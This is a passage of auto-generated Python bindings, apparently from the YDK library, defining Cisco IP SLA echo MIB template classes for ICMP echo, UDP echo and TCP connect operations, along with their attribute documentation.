The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaIcmpEchoTmplStatsNumDistBuckets will be kept. The last cipslaIcmpEchoTmplStatsNumDistBucket will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaicmpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaIcmpEchoTmplDistBuckets = 5 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaIcmpEchoTmplDistBuckets = 1 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaIcmpEchoTmplDistInterval does not apply when cipslaIcmpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaicmpechotmplrowstatus
The status of the conceptual ICMP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplEntry"
self.yang_parent_name = "cipslaIcmpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaicmpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaicmpechotmplname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplName'), ['str'])),
('cipslaicmpechotmpldescription', (YLeaf(YType.str, 'cipslaIcmpEchoTmplDescription'), ['str'])),
('cipslaicmpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaicmpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaIcmpEchoTmplSrcAddr'), ['str'])),
('cipslaicmpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTimeOut'), ['int'])),
('cipslaicmpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaIcmpEchoTmplVerifyData'), ['bool'])),
('cipslaicmpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplReqDataSize'), ['int'])),
('cipslaicmpechotmpltos', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTOS'), ['int'])),
('cipslaicmpechotmplvrfname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplVrfName'), ['str'])),
('cipslaicmpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplThreshold'), ['int'])),
('cipslaicmpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistLives'), ['int'])),
('cipslaicmpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistBuckets'), ['int'])),
('cipslaicmpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter')])),
('cipslaicmpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplStatsHours'), ['int'])),
('cipslaicmpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistBuckets'), ['int'])),
('cipslaicmpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistInterval'), ['int'])),
('cipslaicmpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaicmpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaicmpechotmplname = None
self.cipslaicmpechotmpldescription = None
self.cipslaicmpechotmplsrcaddrtype = None
self.cipslaicmpechotmplsrcaddr = None
self.cipslaicmpechotmpltimeout = None
self.cipslaicmpechotmplverifydata = None
self.cipslaicmpechotmplreqdatasize = None
self.cipslaicmpechotmpltos = None
self.cipslaicmpechotmplvrfname = None
self.cipslaicmpechotmplthreshold = None
self.cipslaicmpechotmplhistlives = None
self.cipslaicmpechotmplhistbuckets = None
self.cipslaicmpechotmplhistfilter = None
self.cipslaicmpechotmplstatshours = None
self.cipslaicmpechotmpldistbuckets = None
self.cipslaicmpechotmpldistinterval = None
self.cipslaicmpechotmplstoragetype = None
self.cipslaicmpechotmplrowstatus = None
self._segment_path = lambda: "cipslaIcmpEchoTmplEntry" + "[cipslaIcmpEchoTmplName='" + str(self.cipslaicmpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaIcmpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, ['cipslaicmpechotmplname', 'cipslaicmpechotmpldescription', 'cipslaicmpechotmplsrcaddrtype', 'cipslaicmpechotmplsrcaddr', 'cipslaicmpechotmpltimeout', 'cipslaicmpechotmplverifydata', 'cipslaicmpechotmplreqdatasize', 'cipslaicmpechotmpltos', 'cipslaicmpechotmplvrfname', 'cipslaicmpechotmplthreshold', 'cipslaicmpechotmplhistlives', 'cipslaicmpechotmplhistbuckets', 'cipslaicmpechotmplhistfilter', 'cipslaicmpechotmplstatshours', 'cipslaicmpechotmpldistbuckets', 'cipslaicmpechotmpldistinterval', 'cipslaicmpechotmplstoragetype', 'cipslaicmpechotmplrowstatus'], name, value)
class CipslaIcmpEchoTmplHistFilter(Enum):
"""
CipslaIcmpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaIcmpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaUdpEchoTmplTable(Entity):
"""
A table that contains UDP echo template specific definitions.
.. attribute:: cipslaudpechotmplentry
A row entry representing an IPSLA UDP echo template
**type**\: list of :py:class:`CipslaUdpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, self).__init__()
self.yang_name = "cipslaUdpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaUdpEchoTmplEntry", ("cipslaudpechotmplentry", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaudpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaUdpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, [], name, value)
class CipslaUdpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA UDP echo template.
.. attribute:: cipslaudpechotmplname (key)
A string which specifies the UDP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaudpechotmpldescription
A string which provides description to the UDP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaudpechotmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslaudpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaUdpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaudpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaudpechotmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslaudpechotmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaudpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaudpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' RTT request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 4..1500
**units**\: octets
.. attribute:: cipslaudpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaudpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing Table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaudpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaUdpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaudpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaudpechotmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaUdpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaUdpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaudpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaUdpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter>`
.. attribute:: cipslaudpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaudpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaUdpEchoTmplStatsNumDistBuckets will be kept. The last cipslaUdpEchoTmplStatsNumDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaudpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaUdpEchoTmplDistBuckets = 5 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaUdpEchoTmplDistBuckets = 1 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaUdpEchoTmplDistInterval does not apply when cipslaUdpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaudpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaudpechotmplrowstatus
The status of the conceptual UDP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaUdpEchoTmplEntry"
self.yang_parent_name = "cipslaUdpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaudpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaudpechotmplname', (YLeaf(YType.str, 'cipslaUdpEchoTmplName'), ['str'])),
('cipslaudpechotmpldescription', (YLeaf(YType.str, 'cipslaUdpEchoTmplDescription'), ['str'])),
('cipslaudpechotmplcontrolenable', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplControlEnable'), ['bool'])),
('cipslaudpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaudpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaUdpEchoTmplSrcAddr'), ['str'])),
('cipslaudpechotmplsrcport', (YLeaf(YType.uint16, 'cipslaUdpEchoTmplSrcPort'), ['int'])),
('cipslaudpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTimeOut'), ['int'])),
('cipslaudpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplVerifyData'), ['bool'])),
('cipslaudpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplReqDataSize'), ['int'])),
('cipslaudpechotmpltos', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTOS'), ['int'])),
('cipslaudpechotmplvrfname', (YLeaf(YType.str, 'cipslaUdpEchoTmplVrfName'), ['str'])),
('cipslaudpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplThreshold'), ['int'])),
('cipslaudpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistLives'), ['int'])),
('cipslaudpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistBuckets'), ['int'])),
('cipslaudpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter')])),
('cipslaudpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplStatsHours'), ['int'])),
('cipslaudpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistBuckets'), ['int'])),
('cipslaudpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistInterval'), ['int'])),
('cipslaudpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaudpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaudpechotmplname = None
self.cipslaudpechotmpldescription = None
self.cipslaudpechotmplcontrolenable = None
self.cipslaudpechotmplsrcaddrtype = None
self.cipslaudpechotmplsrcaddr = None
self.cipslaudpechotmplsrcport = None
self.cipslaudpechotmpltimeout = None
self.cipslaudpechotmplverifydata = None
self.cipslaudpechotmplreqdatasize = None
self.cipslaudpechotmpltos = None
self.cipslaudpechotmplvrfname = None
self.cipslaudpechotmplthreshold = None
self.cipslaudpechotmplhistlives = None
self.cipslaudpechotmplhistbuckets = None
self.cipslaudpechotmplhistfilter = None
self.cipslaudpechotmplstatshours = None
self.cipslaudpechotmpldistbuckets = None
self.cipslaudpechotmpldistinterval = None
self.cipslaudpechotmplstoragetype = None
self.cipslaudpechotmplrowstatus = None
self._segment_path = lambda: "cipslaUdpEchoTmplEntry" + "[cipslaUdpEchoTmplName='" + str(self.cipslaudpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaUdpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, ['cipslaudpechotmplname', 'cipslaudpechotmpldescription', 'cipslaudpechotmplcontrolenable', 'cipslaudpechotmplsrcaddrtype', 'cipslaudpechotmplsrcaddr', 'cipslaudpechotmplsrcport', 'cipslaudpechotmpltimeout', 'cipslaudpechotmplverifydata', 'cipslaudpechotmplreqdatasize', 'cipslaudpechotmpltos', 'cipslaudpechotmplvrfname', 'cipslaudpechotmplthreshold', 'cipslaudpechotmplhistlives', 'cipslaudpechotmplhistbuckets', 'cipslaudpechotmplhistfilter', 'cipslaudpechotmplstatshours', 'cipslaudpechotmpldistbuckets', 'cipslaudpechotmpldistinterval', 'cipslaudpechotmplstoragetype', 'cipslaudpechotmplrowstatus'], name, value)
class CipslaUdpEchoTmplHistFilter(Enum):
"""
CipslaUdpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaUdpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaTcpConnTmplTable(Entity):
"""
A table that contains TCP connect template specific definitions.
.. attribute:: cipslatcpconntmplentry
A row entry representing an IPSLA TCP connect template
**type**\: list of :py:class:`CipslaTcpConnTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, self).__init__()
self.yang_name = "cipslaTcpConnTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaTcpConnTmplEntry", ("cipslatcpconntmplentry", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry))])
self._leafs = OrderedDict()
self.cipslatcpconntmplentry = YList(self)
self._segment_path = lambda: "cipslaTcpConnTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, [], name, value)
class CipslaTcpConnTmplEntry(Entity):
"""
A row entry representing an IPSLA TCP connect template.
.. attribute:: cipslatcpconntmplname (key)
A string which specifies the TCP connect template name
**type**\: str
**length:** 1..64
.. attribute:: cipslatcpconntmpldescription
A string which provides description for the TCP connect template
**type**\: str
**length:** 0..128
.. attribute:: cipslatcpconntmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslatcpconntmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaTcpConnTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslatcpconntmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslatcpconntmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslatcpconntmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslatcpconntmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslatcpconntmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslatcpconntmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaTcpConnTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslatcpconntmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslatcpconntmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaTcpConnTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaTcpConnTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslatcpconntmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaTcpConnTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter>`
.. attribute:: cipslatcpconntmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslatcpconntmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaTcpConnTmplDistBuckets will be kept. The last cipslaTcpConnTmplDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslatcpconntmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaTcpConnTmplDistBuckets = 5 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaTcpConnTmplDistBuckets = 1 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaTcpConnTmplDistInterval does not apply when cipslaTcpConnTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslatcpconntmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslatcpconntmplrowstatus
The status of the conceptual tcp connect control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, self).__init__()
self.yang_name = "cipslaTcpConnTmplEntry"
self.yang_parent_name = "cipslaTcpConnTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslatcpconntmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslatcpconntmplname', (YLeaf(YType.str, 'cipslaTcpConnTmplName'), ['str'])),
('cipslatcpconntmpldescription', (YLeaf(YType.str, 'cipslaTcpConnTmplDescription'), ['str'])),
('cipslatcpconntmplcontrolenable', (YLeaf(YType.boolean, 'cipslaTcpConnTmplControlEnable'), ['bool'])),
('cipslatcpconntmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslatcpconntmplsrcaddr', (YLeaf(YType.str, 'cipslaTcpConnTmplSrcAddr'), ['str'])),
('cipslatcpconntmplsrcport', (YLeaf(YType.uint16, 'cipslaTcpConnTmplSrcPort'), ['int'])),
('cipslatcpconntmpltimeout', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTimeOut'), ['int'])),
('cipslatcpconntmplverifydata', (YLeaf(YType.boolean, 'cipslaTcpConnTmplVerifyData'), ['bool'])),
('cipslatcpconntmpltos', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTOS'), ['int'])),
('cipslatcpconntmplthreshold', (YLeaf(YType.uint32, 'cipslaTcpConnTmplThreshold'), ['int'])),
('cipslatcpconntmplhistlives', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistLives'), ['int'])),
('cipslatcpconntmplhistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistBuckets'), ['int'])),
('cipslatcpconntmplhistfilter', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter')])),
('cipslatcpconntmplstatshours', (YLeaf(YType.uint32, 'cipslaTcpConnTmplStatsHours'), ['int'])),
('cipslatcpconntmpldistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistBuckets'), ['int'])),
('cipslatcpconntmpldistinterval', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistInterval'), ['int'])),
('cipslatcpconntmplstoragetype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslatcpconntmplrowstatus', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslatcpconntmplname = None
self.cipslatcpconntmpldescription = None
self.cipslatcpconntmplcontrolenable = None
self.cipslatcpconntmplsrcaddrtype = None
self.cipslatcpconntmplsrcaddr = None
self.cipslatcpconntmplsrcport = None
self.cipslatcpconntmpltimeout = None
self.cipslatcpconntmplverifydata = None
self.cipslatcpconntmpltos = None
self.cipslatcpconntmplthreshold = None
self.cipslatcpconntmplhistlives = None
self.cipslatcpconntmplhistbuckets = None
self.cipslatcpconntmplhistfilter = None
self.cipslatcpconntmplstatshours = None
self.cipslatcpconntmpldistbuckets = None
self.cipslatcpconntmpldistinterval = None
self.cipslatcpconntmplstoragetype = None
self.cipslatcpconntmplrowstatus = None
self._segment_path = lambda: "cipslaTcpConnTmplEntry" + "[cipslaTcpConnTmplName='" + str(self.cipslatcpconntmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaTcpConnTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
